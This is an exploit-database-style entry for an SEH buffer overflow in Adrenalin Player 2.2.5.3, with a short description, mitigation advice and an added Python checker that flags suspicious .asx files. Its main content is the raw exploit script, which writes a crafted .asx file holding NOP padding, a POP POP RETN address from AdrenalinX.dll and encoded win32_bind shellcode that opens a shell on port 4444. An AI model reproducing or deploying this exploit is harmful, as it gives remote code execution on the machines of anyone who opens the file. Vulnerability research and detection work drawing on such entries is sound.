vendor: Adrenalin Player
by: onying
CVSS: N/A
HIGH
SEH Buffer Overflow
CWE: 119
Product Name: Adrenalin Player
Affected Version From: 2.2.5.3
Affected Version To: 2.2.5.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2013

Adrenalin Player (.asx) – SEH Buffer Overflow

The exploit takes advantage of a buffer overflow vulnerability in Adrenalin Player. By sending a specially crafted .asx file, an attacker can overwrite the Structured Exception Handler (SEH) and gain control of the program execution flow. This exploit has been tested on Adrenalin Player version 2.2.5.3 running on Windows XP SP3.

Mitigation:

Update to the latest version of Adrenalin Player. Avoid opening .asx files from untrusted sources.
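
One way to triage .asx files before they reach the player, as an added example (not part of the original entry or the exploit author's code): it flags the traits of the crafted file described above, namely binary bytes in what should be XML-like text, a long run of one repeated byte, and a single oversized unbroken field. The thresholds, finding names and both sample inputs are assumptions constructed for this example.

```python
import re

# Thresholds are assumptions for this example; tune them against real playlists.
MAX_RUN = 64             # longest tolerated run of one repeated byte
MAX_TOKEN = 1024         # longest tolerated stretch without whitespace
MAX_BINARY_RATIO = 0.05  # tolerated share of bytes outside printable ASCII

TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def inspect_asx(data: bytes) -> list:
    """Return findings for one .asx file's raw bytes (empty list = nothing flagged)."""
    findings = []
    if not data:
        return findings

    # ASX is XML-like text, so bytes outside printable ASCII should be rare.
    binary = sum(1 for b in data if b not in TEXT_BYTES)
    if binary / len(data) > MAX_BINARY_RATIO:
        findings.append("binary-content")

    # Filler such as a 0x90 pad shows up as one byte repeated many times.
    run = max(len(m.group(0)) for m in re.finditer(rb"(.)\1*", data, re.DOTALL))
    if run > MAX_RUN:
        findings.append("repeated-byte-run")

    # Playlist attributes and URLs are short; one huge unbroken field is not.
    token = max((len(t) for t in data.split()), default=0)
    if token > MAX_TOKEN:
        findings.append("oversized-token")
    return findings


# Constructed sample: an ordinary playlist.
BENIGN = (b'<asx version="3.0">\r\n  <entry>\r\n    <title>Track 1</title>\r\n'
          b'    <ref href="http://media.example/track1.wma" />\r\n  </entry>\r\n</asx>\r\n')

# Constructed sample: same header/footer layout as the crafted file, filler only.
SUSPICIOUS = b"<asx version = 3.0 > " + b"\x90" * 3000 + b"</asx>"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_asx(blob))
```

The repeated-byte and oversized-token checks still fire when the filler is printable ASCII, so they do not depend on the binary-content check.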

Exploit-DB raw data:

# ======================================================================================#
# !/usr/bin/python									#
# Title:                Adrenalin Player (.asx) - SEH Buffer Overflow 			#
# software: 		Adrenalin Player						#
# version : 		2.2.5.3								#
# Platform:             Windows XP sp3							#
# Date:                 June 18th, 2013							#
# Author:               onying (@onyiing)						#
# Blog :		http://itsecuritynewbie.blogspot.com/ 				#
# Thanks to:            Information Security Shinobi Camp | http://www.is2c-dojo.com 	#
# ======================================================================================#
header="<asx version = 3.0 > "
junk= "\x90" * 2079
junk+="\xeb\x06\x90\x90" #jmp short
junk+="\x13\xf3\x16\x10" #POP POP RETN AdrenalinX.dll
junk+="\x90" * 16 # NOP padding before shellcode

#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
"\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
"\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
"\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
"\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
"\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
"\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
"\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
"\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
"\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
"\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
"\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
"\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
"\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
"\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
"\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
"\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
"\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
"\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
"\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
"\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
"\xbd\x19\xd1\xd5\xc2\x08\xe9\x09")
junk+= "\x90" * (3000-len(junk))
footer="</asx>"
file = open("adrenalin.asx","w")
file.write(header+junk+footer)
file.close()